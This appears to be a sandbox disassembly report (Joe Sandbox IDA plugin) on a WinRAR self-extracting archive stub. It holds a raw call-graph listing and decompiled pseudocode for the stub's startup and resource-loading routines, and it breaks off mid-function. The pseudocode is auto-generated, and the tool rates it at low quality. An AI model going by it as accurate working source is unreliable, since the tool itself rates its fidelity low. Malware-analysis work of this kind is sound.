24169->24028 24170->24028 24172 cd0666 _wcslen 24171->24172 24199 cc17e9 24172->24199 24174 cd067e 24174->24052 24176 cd0659 _wcslen 24175->24176 24177 cc17e9 78 API calls 24176->24177 24178 cd067e 24177->24178 24178->24054 24180 cc7b17 __EH_prolog 24179->24180 24216 ccce40 24180->24216 24182 cc7b32 24222 cdeb38 24182->24222 24184 cc7b5c 24231 cd4a76 24184->24231 24187 cc7c7d 24188 cc7c87 24187->24188 24190 cc7cf1 24188->24190 24263 cca56d 24188->24263 24193 cc7d50 24190->24193 24241 cc8284 24190->24241 24191 cc7d92 24191->24058 24193->24191 24269 cc138b 74 API calls 24193->24269 24196 cc7bac 24195->24196 24198 cc7bb3 24195->24198 24197 cd2297 86 API calls 24196->24197 24197->24198 24200 cc17ff 24199->24200 24211 cc185a __InternalCxxFrameHandler 24199->24211 24201 cc1828 24200->24201 24212 cc6c36 76 API calls __vswprintf_c_l 24200->24212 24202 cc1887 24201->24202 24208 cc1847 ___std_exception_copy 24201->24208 24205 ce3e3e 22 API calls 24202->24205 24204 cc181e 24213 cc6ca7 75 API calls 24204->24213 24206 cc188e 24205->24206 24206->24211 24215 cc6ca7 75 API calls 24206->24215 24208->24211 24214 cc6ca7 75 API calls 24208->24214 24211->24174 24212->24204 24213->24201 24214->24211 24215->24211 24217 ccce4a __EH_prolog 24216->24217 24218 cdeb38 8 API calls 24217->24218 24219 ccce8d 24218->24219 24220 cdeb38 8 API calls 24219->24220 24221 ccceb1 24220->24221 24221->24182 24223 cdeb3d ___std_exception_copy 24222->24223 24224 cdeb57 24223->24224 24227 cdeb59 24223->24227 24237 ce7a5e 7 API calls 2 library calls 24223->24237 24224->24184 24226 cdf5c9 24239 ce238d RaiseException 24226->24239 24227->24226 24238 ce238d RaiseException 24227->24238 24229 cdf5e6 24232 cd4a80 __EH_prolog 24231->24232 24233 cdeb38 8 API calls 24232->24233 24234 cd4a9c 24233->24234 24235 cc7b8b 24234->24235 24240 cd0e46 80 API calls 24234->24240 24235->24187 24237->24223 24238->24226 24239->24229 24240->24235 24242 cc828e __EH_prolog 24241->24242 24270 cc13dc 24242->24270 24244 cc82aa 24245 cc82bb 
24244->24245 24413 cc9f42 24244->24413 24250 cc82f2 24245->24250 24278 cc1a04 24245->24278 24409 cc1692 24250->24409 24251 cc8389 24297 cc8430 24251->24297 24255 cc83e8 24305 cc1f6d 24255->24305 24258 cc83f3 24258->24250 24309 cc3b2d 24258->24309 24321 cc848e 24258->24321 24260 cca56d 7 API calls 24261 cc82ee 24260->24261 24261->24250 24261->24251 24261->24260 24417 ccc0c5 CompareStringW _wcslen 24261->24417 24264 cca582 24263->24264 24268 cca5b0 24264->24268 24700 cca69b 24264->24700 24266 cca592 24267 cca597 FindClose 24266->24267 24266->24268 24267->24268 24268->24188 24269->24191 24271 cc13e1 __EH_prolog 24270->24271 24272 ccce40 8 API calls 24271->24272 24273 cc1419 24272->24273 24274 cdeb38 8 API calls 24273->24274 24277 cc1474 __cftof 24273->24277 24275 cc1461 24274->24275 24276 ccb505 84 API calls 24275->24276 24275->24277 24276->24277 24277->24244 24279 cc1a0e __EH_prolog 24278->24279 24291 cc1a61 24279->24291 24294 cc1b9b 24279->24294 24418 cc13ba 24279->24418 24281 cc1bc7 24430 cc138b 74 API calls 24281->24430 24284 cc3b2d 101 API calls 24288 cc1c12 24284->24288 24285 cc1bd4 24285->24284 24285->24294 24286 cc1c5a 24290 cc1c8d 24286->24290 24286->24294 24431 cc138b 74 API calls 24286->24431 24288->24286 24289 cc3b2d 101 API calls 24288->24289 24289->24288 24290->24294 24295 cc9e80 79 API calls 24290->24295 24291->24281 24291->24285 24291->24294 24292 cc3b2d 101 API calls 24293 cc1cde 24292->24293 24293->24292 24293->24294 24294->24261 24295->24293 24451 cccf3d 24297->24451 24299 cc8440 24455 cd13d2 GetSystemTime SystemTimeToFileTime 24299->24455 24301 cc83a3 24301->24255 24302 cd1b66 24301->24302 24462 cdde6b 24302->24462 24306 cc1f72 __EH_prolog 24305->24306 24308 cc1fa6 24306->24308 24470 cc19af 24306->24470 24308->24258 24310 cc3b3d 24309->24310 24311 cc3b39 24309->24311 24320 cc9e80 79 API calls 24310->24320 24311->24258 24312 cc3b4f 24313 cc3b78 24312->24313 24314 cc3b6a 24312->24314 24624 cc286b 101 API calls 3 library calls 24313->24624 24316 
cc3baa 24314->24316 24623 cc32f7 89 API calls 2 library calls 24314->24623 24316->24258 24318 cc3b76 24318->24316 24625 cc20d7 74 API calls 24318->24625 24320->24312 24322 cc8498 __EH_prolog 24321->24322 24325 cc84d5 24322->24325 24332 cc8513 24322->24332 24650 cd8c8d 103 API calls 24322->24650 24324 cc84f5 24326 cc851c 24324->24326 24327 cc84fa 24324->24327 24325->24324 24330 cc857a 24325->24330 24325->24332 24326->24332 24652 cd8c8d 103 API calls 24326->24652 24327->24332 24651 cc7a0d 152 API calls 24327->24651 24330->24332 24626 cc5d1a 24330->24626 24332->24258 24333 cc8605 24333->24332 24632 cc8167 24333->24632 24336 cc8797 24337 cca56d 7 API calls 24336->24337 24338 cc8802 24336->24338 24337->24338 24638 cc7c0d 24338->24638 24340 ccd051 82 API calls 24346 cc885d 24340->24346 24341 cc898b 24655 cc2021 74 API calls 24341->24655 24342 cc8992 24343 cc8a5f 24342->24343 24349 cc89e1 24342->24349 24347 cc8ab6 24343->24347 24361 cc8a6a 24343->24361 24346->24332 24346->24340 24346->24341 24346->24342 24653 cc8117 84 API calls 24346->24653 24654 cc2021 74 API calls 24346->24654 24353 cc8a4c 24347->24353 24658 cc7fc0 97 API calls 24347->24658 24348 cc8ab4 24354 cc959a 80 API calls 24348->24354 24351 cc8b14 24349->24351 24349->24353 24355 cca231 3 API calls 24349->24355 24350 cc9105 24352 cc959a 80 API calls 24350->24352 24351->24350 24369 cc8b82 24351->24369 24659 cc98bc 24351->24659 24352->24332 24353->24348 24353->24351 24354->24332 24357 cc8a19 24355->24357 24357->24353 24656 cc92a3 97 API calls 24357->24656 24358 ccab1a 8 API calls 24362 cc8bd1 24358->24362 24361->24348 24657 cc7db2 101 API calls 24361->24657 24364 ccab1a 8 API calls 24362->24364 24379 cc8be7 24364->24379 24367 cc8b70 24663 cc6e98 77 API calls 24367->24663 24369->24358 24370 cc8cbc 24371 cc8d18 24370->24371 24372 cc8e40 24370->24372 24373 cc8d8a 24371->24373 24376 cc8d28 24371->24376 24374 cc8e66 24372->24374 24375 cc8e52 24372->24375 24395 cc8d49 24372->24395 24383 cc8167 19 API calls 24373->24383 
24378 cd3377 75 API calls 24374->24378 24377 cc9215 123 API calls 24375->24377 24380 cc8d6e 24376->24380 24385 cc8d37 24376->24385 24377->24395 24381 cc8e7f 24378->24381 24379->24370 24382 cc8c93 24379->24382 24390 cc981a 79 API calls 24379->24390 24380->24395 24666 cc77b8 111 API calls 24380->24666 24387 cd3020 123 API calls 24381->24387 24382->24370 24664 cc9a3c 82 API calls 24382->24664 24384 cc8dbd 24383->24384 24391 cc8df5 24384->24391 24392 cc8de6 24384->24392 24384->24395 24665 cc2021 74 API calls 24385->24665 24387->24395 24390->24382 24668 cc9155 93 API calls __EH_prolog 24391->24668 24667 cc7542 85 API calls 24392->24667 24399 cc8f85 24395->24399 24669 cc2021 74 API calls 24395->24669 24397 cca4ed 3 API calls 24401 cc90eb 24397->24401 24398 cc903e 24645 cc9da2 24398->24645 24399->24350 24399->24398 24406 cc9090 24399->24406 24644 cc9f09 SetEndOfFile 24399->24644 24401->24350 24670 cc2021 74 API calls 24401->24670 24403 cc9085 24404 cc9620 77 API calls 24403->24404 24404->24406 24406->24350 24406->24397 24407 cc90fb 24671 cc6dcb 76 API calls 24407->24671 24410 cc16a4 24409->24410 24687 cccee1 24410->24687 24414 cc9f59 24413->24414 24415 cc9f63 24414->24415 24699 cc6d0c 78 API calls 24414->24699 24415->24245 24417->24261 24432 cc1732 24418->24432 24420 cc13d6 24421 cc9e80 24420->24421 24422 cc9e92 24421->24422 24426 cc9ea5 24421->24426 24423 cc9eb0 24422->24423 24449 cc6d5b 77 API calls 24422->24449 24423->24291 24425 cc9eb8 SetFilePointer 24425->24423 24427 cc9ed4 GetLastError 24425->24427 24426->24423 24426->24425 24427->24423 24428 cc9ede 24427->24428 24428->24423 24450 cc6d5b 77 API calls 24428->24450 24430->24294 24431->24290 24433 cc1748 24432->24433 24443 cc17a0 __InternalCxxFrameHandler 24432->24443 24434 cc1771 24433->24434 24445 cc6c36 76 API calls __vswprintf_c_l 24433->24445 24436 cc17c7 24434->24436 24441 cc178d ___std_exception_copy 24434->24441 24438 ce3e3e 22 API calls 24436->24438 24437 cc1767 24446 cc6ca7 75 API calls 24437->24446 24440 
cc17ce 24438->24440 24440->24443 24448 cc6ca7 75 API calls 24440->24448 24441->24443 24447 cc6ca7 75 API calls 24441->24447 24443->24420 24445->24437 24446->24434 24447->24443 24448->24443 24449->24426 24450->24423 24452 cccf4d 24451->24452 24454 cccf54 24451->24454 24456 cc981a 24452->24456 24454->24299 24455->24301 24457 cc9833 24456->24457 24460 cc9e80 79 API calls 24457->24460 24458 cc9837 24461 cc9e80 79 API calls 24458->24461 24459 cc9865 24459->24454 24460->24458 24461->24459 24463 cdde78 24462->24463 24464 cce617 53 API calls 24463->24464 24465 cdde9b 24464->24465 24466 cc4092 _swprintf 51 API calls 24465->24466 24467 cddead 24466->24467 24468 cdd4d4 16 API calls 24467->24468 24469 cd1b7c 24468->24469 24469->24255 24471 cc19bf 24470->24471 24473 cc19bb 24470->24473 24474 cc18f6 24471->24474 24473->24308 24475 cc1908 24474->24475 24476 cc1945 24474->24476 24477 cc3b2d 101 API calls 24475->24477 24482 cc3fa3 24476->24482 24480 cc1928 24477->24480 24480->24473 24483 cc3fac 24482->24483 24484 cc3b2d 101 API calls 24483->24484 24485 cc1966 24483->24485 24499 cd0e08 24483->24499 24484->24483 24485->24480 24487 cc1e50 24485->24487 24488 cc1e5a __EH_prolog 24487->24488 24507 cc3bba 24488->24507 24490 cc1e84 24491 cc1732 78 API calls 24490->24491 24494 cc1f0b 24490->24494 24492 cc1e9b 24491->24492 24535 cc18a9 78 API calls 24492->24535 24494->24480 24495 cc1eb3 24497 cc1ebf _wcslen 24495->24497 24536 cd1b84 MultiByteToWideChar 24495->24536 24537 cc18a9 78 API calls 24497->24537 24500 cd0e0f 24499->24500 24501 cd0e2a 24500->24501 24505 cc6c31 RaiseException CallUnexpected 24500->24505 24503 cd0e3b SetThreadExecutionState 24501->24503 24506 cc6c31 RaiseException CallUnexpected 24501->24506 24503->24483 24505->24501 24506->24503 24508 cc3bc4 __EH_prolog 24507->24508 24509 cc3bda 24508->24509 24510 cc3bf6 24508->24510 24563 cc138b 74 API calls 24509->24563 24512 cc3e51 24510->24512 24515 cc3c22 24510->24515 24588 cc138b 74 API calls 24512->24588 24514 cc3be5 
24514->24490 24515->24514 24538 cd3377 24515->24538 24517 cc3ca3 24518 cc3d2e 24517->24518 24534 cc3c9a 24517->24534 24566 ccd051 24517->24566 24548 ccab1a 24518->24548 24519 cc3c9f 24519->24517 24565 cc20bd 78 API calls 24519->24565 24521 cc3c8f 24564 cc138b 74 API calls 24521->24564 24522 cc3c71 24522->24517 24522->24519 24522->24521 24526 cc3d41 24528 cc3dd7 24526->24528 24529 cc3dc7 24526->24529 24572 cd3020 24528->24572 24552 cc9215 24529->24552 24532 cc3dd5 24532->24534 24581 cc2021 74 API calls 24532->24581 24582 cd2297 24534->24582 24535->24495 24536->24497 24537->24494 24539 cd338c 24538->24539 24541 cd3396 ___std_exception_copy 24538->24541 24589 cc6ca7 75 API calls 24539->24589 24542 cd34c6 24541->24542 24543 cd341c 24541->24543 24547 cd3440 __cftof 24541->24547 24591 ce238d RaiseException 24542->24591 24590 cd32aa 75 API calls 3 library calls 24543->24590 24546 cd34f2 24547->24522 24549 ccab28 24548->24549 24551 ccab32 24548->24551 24550 cdeb38 8 API calls 24549->24550 24550->24551 24551->24526 24553 cc921f __EH_prolog 24552->24553 24592 cc7c64 24553->24592 24556 cc13ba 78 API calls 24557 cc9231 24556->24557 24595 ccd114 24557->24595 24559 cc928a 24559->24532 24560 cc9243 24560->24559 24562 ccd114 118 API calls 24560->24562 24604 ccd300 97 API calls __InternalCxxFrameHandler 24560->24604 24562->24560 24563->24514 24564->24534 24565->24517 24567 ccd084 24566->24567 24568 ccd072 24566->24568 24606 cc603a 82 API calls 24567->24606 24605 cc603a 82 API calls 24568->24605 24571 ccd07c 24571->24518 24573 cd3052 24572->24573 24575 cd3029 24572->24575 24580 cd3046 24573->24580 24621 cd552f 123 API calls 2 library calls 24573->24621 24574 cd3048 24620 cd624a 118 API calls 24574->24620 24575->24574 24577 cd303e 24575->24577 24575->24580 24607 cd6cdc 24577->24607 24580->24532 24581->24534 24583 cd22a1 24582->24583 24584 cd22ba 24583->24584 24587 cd22ce 24583->24587 24622 cd0eed 86 API calls 24584->24622 24586 cd22c1 24586->24587 24588->24514 24589->24541 
24590->24547 24591->24546 24593 ccb146 GetVersionExW 24592->24593 24594 cc7c69 24593->24594 24594->24556 24600 ccd12a __InternalCxxFrameHandler 24595->24600 24596 ccd29a 24597 ccd2ce 24596->24597 24598 ccd0cb 6 API calls 24596->24598 24599 cd0e08 SetThreadExecutionState RaiseException 24597->24599 24598->24597 24602 ccd291 24599->24602 24600->24596 24601 cd8c8d 103 API calls 24600->24601 24600->24602 24603 ccac05 91 API calls 24600->24603 24601->24600 24602->24560 24603->24600 24604->24560 24605->24571 24606->24571 24608 cd359e 75 API calls 24607->24608 24609 cd6ced __InternalCxxFrameHandler 24608->24609 24610 ccd114 118 API calls 24609->24610 24611 cd70fe 24609->24611 24614 cd11cf 81 API calls 24609->24614 24615 cd3e0b 118 API calls 24609->24615 24616 cd7153 118 API calls 24609->24616 24617 cd0f86 88 API calls 24609->24617 24618 cd77ef 123 API calls 24609->24618 24619 cd390d 98 API calls 24609->24619 24610->24609 24612 cd5202 98 API calls 24611->24612 24613 cd710e __InternalCxxFrameHandler 24612->24613 24613->24580 24614->24609 24615->24609 24616->24609 24617->24609 24618->24609 24619->24609 24620->24580 24621->24580 24622->24586 24623->24318 24624->24318 24625->24316 24627 cc5d2a 24626->24627 24672 cc5c4b 24627->24672 24630 cc5d5d 24631 cc5d95 24630->24631 24677 ccb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 24630->24677 24631->24333 24633 cc8186 24632->24633 24634 cc8232 24633->24634 24684 ccbe5e 19 API calls __InternalCxxFrameHandler 24633->24684 24683 cd1fac CharUpperW 24634->24683 24637 cc823b 24637->24336 24639 cc7c22 24638->24639 24640 cc7c5a 24639->24640 24685 cc6e7a 74 API calls 24639->24685 24640->24346 24642 cc7c52 24686 cc138b 74 API calls 24642->24686 24644->24398 24646 cc9db3 24645->24646 24648 cc9dc2 24645->24648 24647 cc9db9 FlushFileBuffers 24646->24647 24646->24648 24647->24648 24649 cc9e3f SetFileTime 24648->24649 24649->24403 24650->24325 24651->24332 24652->24332 24653->24346 24654->24346 24655->24342 24656->24353 24657->24348 
24658->24353 24660 cc98c5 GetFileType 24659->24660 24661 cc8b5a 24659->24661 24660->24661 24661->24369 24662 cc2021 74 API calls 24661->24662 24662->24367 24663->24369 24664->24370 24665->24395 24666->24395 24667->24395 24668->24395 24669->24399 24670->24407 24671->24350 24678 cc5b48 24672->24678 24675 cc5c6c 24675->24630 24676 cc5b48 2 API calls 24676->24675 24677->24630 24681 cc5b52 24678->24681 24679 cc5c3a 24679->24675 24679->24676 24681->24679 24682 ccb1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 24681->24682 24682->24681 24683->24637 24684->24634 24685->24642 24686->24640 24688 cccef2 24687->24688 24693 cca99e 24688->24693 24690 cccf24 24691 cca99e 86 API calls 24690->24691 24692 cccf2f 24691->24692 24694 cca9c1 24693->24694 24697 cca9d5 24693->24697 24698 cd0eed 86 API calls 24694->24698 24696 cca9c8 24696->24697 24697->24690 24698->24696 24699->24415 24701 cca6a8 24700->24701 24702 cca727 FindNextFileW 24701->24702 24703 cca6c1 FindFirstFileW 24701->24703 24704 cca732 GetLastError 24702->24704 24710 cca709 24702->24710 24705 cca6d0 24703->24705 24703->24710 24704->24710 24706 ccbb03 GetCurrentDirectoryW 24705->24706 24707 cca6e0 24706->24707 24708 cca6fe GetLastError 24707->24708 24709 cca6e4 FindFirstFileW 24707->24709 24708->24710 24709->24708 24709->24710 24710->24266 24720 cda5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24711->24720 24713 cda5cd 24714 cda5d9 24713->24714 24721 cda605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24713->24721 24714->24065 24714->24066 24716->24072 24717->24075 24718->24075 24719->24078 24720->24713 24721->24714 24722->24086 24724 cc9f42 78 API calls 24723->24724 24725 cc1fe8 24724->24725 24726 cc1a04 101 API calls 24725->24726 24729 cc2005 24725->24729 24727 cc1ff5 24726->24727 24727->24729 24730 cc138b 74 API calls 24727->24730 24729->24094 24729->24095 24730->24729 24731 cc13e1 84 API calls 2 library calls 25409 cd94e0 GetClientRect 25444 cd21e0 26 API calls std::bad_exception::bad_exception 25470 cdf2e0 
46 API calls __RTC_Initialize 25471 cebee0 GetCommandLineA GetCommandLineW 25410 ce2cfb 38 API calls 4 library calls 25445 cc95f0 80 API calls 25446 cdfd4f 9 API calls 2 library calls 25472 cc5ef0 82 API calls 24754 ce98f0 24762 ceadaf 24754->24762 24758 ce990c 24759 ce9919 24758->24759 24770 ce9920 11 API calls 24758->24770 24761 ce9904 24771 ceac98 24762->24771 24765 ceadee TlsAlloc 24766 ceaddf 24765->24766 24767 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24766->24767 24768 ce98fa 24767->24768 24768->24761 24769 ce9869 20 API calls 2 library calls 24768->24769 24769->24758 24770->24761 24772 ceacc8 24771->24772 24774 ceacc4 24771->24774 24772->24765 24772->24766 24774->24772 24776 ceace8 24774->24776 24778 cead34 24774->24778 24775 ceacf4 GetProcAddress 24777 cead04 __dosmaperr 24775->24777 24776->24772 24776->24775 24777->24772 24779 cead4a 24778->24779 24780 cead55 LoadLibraryExW 24778->24780 24779->24774 24781 cead72 GetLastError 24780->24781 24783 cead8a 24780->24783 24782 cead7d LoadLibraryExW 24781->24782 24781->24783 24782->24783 24783->24779 24784 ceada1 FreeLibrary 24783->24784 24784->24779 24786 ceabf0 24787 ceabfb 24786->24787 24789 ceac24 24787->24789 24791 ceac20 24787->24791 24792 ceaf0a 24787->24792 24799 ceac50 DeleteCriticalSection 24789->24799 24793 ceac98 __dosmaperr 5 API calls 24792->24793 24794 ceaf31 24793->24794 24795 ceaf4f InitializeCriticalSectionAndSpinCount 24794->24795 24796 ceaf3a 24794->24796 24795->24796 24797 cdfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24796->24797 24798 ceaf66 24797->24798 24798->24787 24799->24791 25412 ce88f0 7 API calls ___scrt_uninitialize_crt 25448 cdb18d 78 API calls 25413 cdc793 97 API calls 4 library calls 25473 cdc793 102 API calls 4 library calls 25451 cd9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25490 cc6faa 111 API calls 3 library calls 25453 cdeda7 48 API calls _unexpected 25416 cddca1 DialogBoxParamW 

                                                    Control-flow Graph

                                                    C-Code - Quality: 17%
                                                    			E00CDDF1E(void* __edx, void* __ebp, void* __eflags, void* __fp0, void* _a92, void* _a94, void* _a98, void* _a100, void* _a102, void* _a104, void* _a106, void* _a108, void* _a112, void* _a152, void* _a156, void* _a204) {
                                                    				char _v208;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* _t40;
                                                    				void* _t41;
                                                    				long _t50;
                                                    				void* _t53;
                                                    				intOrPtr _t57;
                                                    				struct HWND__* _t73;
                                                    				void* _t74;
                                                    				WCHAR* _t92;
                                                    				struct HINSTANCE__* _t93;
                                                    				intOrPtr _t94;
                                                    				void* _t98;
                                                    				void* _t100;
                                                    				void* _t101;
                                                    				void* _t102;
                                                    				void* _t120;
                                                    
                                                    				_t120 = __fp0;
                                                    				_t86 = __edx;
                                                    				E00CD0863(__edx, 1);
                                                    				E00CDA64D("C:\Users\alfons\Desktop", 0x800);
                                                    				_t75 =  &_v208;
                                                    				E00CDAC16( &_v208); // executed
                                                    				_t73 = 0;
                                                    				E00CDFFF0(0x7104, 0xd17b80, 0, 0x7104);
                                                    				_t101 = _t100 + 0xc;
                                                    				_t92 = GetCommandLineW();
                                                    				_t105 = _t92;
                                                    				if(_t92 != 0) {
                                                    					_push(_t92);
                                                    					E00CDC5C4(0, _t105);
                                                    					if( *0xd0a471 == 0) {
                                                    						E00CDDBDE(__eflags, _t92); // executed
                                                    					} else {
                                                    						_t98 = OpenFileMappingW(0xf001f, 0, L"winrarsfxmappingfile.tmp");
                                                    						if(_t98 != 0) {
                                                    							UnmapViewOfFile(_t74);
                                                    							_t73 = 0;
                                                    						}
                                                    						CloseHandle(_t98);
                                                    					}
                                                    				}
                                                    				GetModuleFileNameW(_t73, 0xd1ec90, 0x800);
                                                    				SetEnvironmentVariableW(L"sfxname", 0xd1ec90); // executed
                                                    				GetLocalTime(_t101 + 0xc);
                                                    				_push( *(_t101 + 0x1a) & 0x0000ffff);
                                                    				_push( *(_t101 + 0x1c) & 0x0000ffff);
                                                    				_push( *(_t101 + 0x1e) & 0x0000ffff);
                                                    				_push( *(_t101 + 0x20) & 0x0000ffff);
                                                    				_push( *(_t101 + 0x22) & 0x0000ffff);
                                                    				_push( *(_t101 + 0x22) & 0x0000ffff);
                                                    				E00CC4092(_t101 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t101 + 0x24) & 0x0000ffff);
                                                    				_t102 = _t101 + 0x28;
                                                    				SetEnvironmentVariableW(L"sfxstime", _t102 + 0x7c);
                                                    				_t93 = GetModuleHandleW(_t73);
                                                    				 *0xd0102c = _t93;
                                                    				 *0xd01028 = _t93; // executed
                                                    				_t40 = LoadIconW(_t93, 0x64); // executed
                                                    				 *0xd17b7c = _t40; // executed
                                                    				_t41 = E00CDB6DD(_t75, _t86, _t120); // executed
                                                    				 *0xd1ec84 = _t41;
                                                    				E00CCDA42(0xd01030, _t86, 0, 0xd1ec90);
                                                    				E00CD90B7(0);
                                                    				E00CD90B7(0);
                                                    				 *0xd08440 = _t102 + 0x5c;
                                                    				 *0xd08444 = _t102 + 0x30; // executed
                                                    				DialogBoxParamW(_t93, L"STARTDLG", _t73, E00CDB7E0, _t73); // executed
                                                    				 *0xd08444 = _t73;
                                                    				 *0xd08440 = _t73;
                                                    				E00CD9178(_t102 + 0x24);
                                                    				E00CD9178(_t102 + 0x50);
                                                    				_t50 =  *0xd1fca8;
                                                    				if(_t50 != 0) {
                                                    					Sleep(_t50);
                                                    				}
                                                    				if( *0xd09468 != 0) {
                                                    					E00CDAE2F(0xd1ec90);
                                                    				}
                                                    				E00CCF279(0xd17a78);
                                                    				if( *0xd1fca0 > 0) {
                                                    					L00CDEE5C( *0xd1fc90);
                                                    				}
                                                    				DeleteObject( *0xd17b7c);
                                                    				_t53 =  *0xd1ec84;
                                                    				if(_t53 != 0) {
                                                    					DeleteObject(_t53);
                                                    				}
                                                    				if( *0xd01098 == 0 &&  *0xd08454 != 0) {
                                                    					E00CC6D83(0xd01098, 0xff);
                                                    				}
                                                    				_t54 =  *0xd1fcac;
                                                    				 *0xd08454 = 1;
                                                    				if( *0xd1fcac != 0) {
                                                    					E00CDDC3B(_t54);
                                                    					CloseHandle( *0xd1fcac);
                                                    				}
                                                    				_t94 =  *0xd01098;
                                                    				if( *0xd17b7a != 0) {
                                                    					_t57 =  *0xcfe728; // 0x3e8
                                                    					if( *0xd17b7b == 0) {
                                                    						__eflags = _t57;
                                                    						if(_t57 < 0) {
                                                    							_t94 = _t94 - _t57;
                                                    							__eflags = _t94;
                                                    						}
                                                    					} else {
                                                    						_t94 =  *0xd1fca4;
                                                    						if(_t57 > 0) {
                                                    							_t94 = _t94 + _t57;
                                                    						}
                                                    					}
                                                    				}
                                                    				E00CDAC7C(_t102 + 0x1c); // executed
                                                    				return _t94;
                                                    			}

                                                    APIs
                                                      • Part of subcall function 00CD0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00CD087C
                                                      • Part of subcall function 00CD0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CD088E
                                                      • Part of subcall function 00CD0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CD08BF
                                                      • Part of subcall function 00CDA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CDA655
                                                      • Part of subcall function 00CDAC16: OleInitialize.OLE32(00000000), ref: 00CDAC2F
                                                      • Part of subcall function 00CDAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CDAC66
                                                      • Part of subcall function 00CDAC16: SHGetMalloc.SHELL32(00D08438), ref: 00CDAC70
                                                    • GetCommandLineW.KERNEL32 ref: 00CDDF5C
                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CDDF83
                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00CDDF94
                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00CDDFCE
                                                      • Part of subcall function 00CDDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CDDBF4
                                                      • Part of subcall function 00CDDBDE: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CDDC30
                                                    • CloseHandle.KERNEL32(00000000), ref: 00CDDFD7
                                                    • GetModuleFileNameW.KERNEL32(00000000,00D1EC90,00000800), ref: 00CDDFF2
                                                    • SetEnvironmentVariableW.KERNELBASE(sfxname,00D1EC90), ref: 00CDDFFE
                                                    • GetLocalTime.KERNEL32(?), ref: 00CDE009
                                                    • _swprintf.LIBCMT ref: 00CDE048
                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CDE05A
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00CDE061
                                                    • LoadIconW.USER32(00000000,00000064), ref: 00CDE078
                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00CDE0C9
                                                    • Sleep.KERNEL32(?), ref: 00CDE0F7
                                                    • DeleteObject.GDI32 ref: 00CDE130
                                                    • DeleteObject.GDI32(?), ref: 00CDE140
                                                    • CloseHandle.KERNEL32 ref: 00CDE183
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                    • API String ID: 3049964643-2656992072
                                                    • Opcode ID: 96511bb60a9eb4bd604035a040d458a2f503e503838da82f012c614102627c1a
                                                    • Instruction ID: ad3e4e2afdb8e70426ef12c3275aaf09c854915aef461ab4cb38d36035651922
                                                    • Opcode Fuzzy Hash: 96511bb60a9eb4bd604035a040d458a2f503e503838da82f012c614102627c1a
                                                    • Instruction Fuzzy Hash: E961D271A04345BBD320ABA4EC49F7F77A9AB45700F00442BFA4AD23A1DF749944D772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 812 cda6c2-cda6df FindResourceW 813 cda7db 812->813 814 cda6e5-cda6f6 SizeofResource 812->814 815 cda7dd-cda7e1 813->815 814->813 816 cda6fc-cda70b LoadResource 814->816 816->813 817 cda711-cda71c LockResource 816->817 817->813 818 cda722-cda737 GlobalAlloc 817->818 819 cda73d-cda746 GlobalLock 818->819 820 cda7d3-cda7d9 818->820 821 cda7cc-cda7cd GlobalFree 819->821 822 cda74c-cda76a call ce0320 819->822 820->815 821->820 826 cda76c-cda78e call cda626 822->826 827 cda7c5-cda7c6 GlobalUnlock 822->827 826->827 832 cda790-cda798 826->832 827->821 833 cda79a-cda7ae GdipCreateHBITMAPFromBitmap 832->833 834 cda7b3-cda7c1 832->834 833->834 835 cda7b0 833->835 834->827 835->834
                                                    C-Code - Quality: 53%
                                                    			E00CDA6C2(WCHAR* _a4) {
                                                    				char _v4;
                                                    				char _v8;
                                                    				char _v20;
                                                    				intOrPtr* _v28;
                                                    				void* __ecx;
                                                    				void* _t17;
                                                    				void* _t18;
                                                    				void* _t19;
                                                    				intOrPtr* _t27;
                                                    				char* _t34;
                                                    				void* _t36;
                                                    				void* _t38;
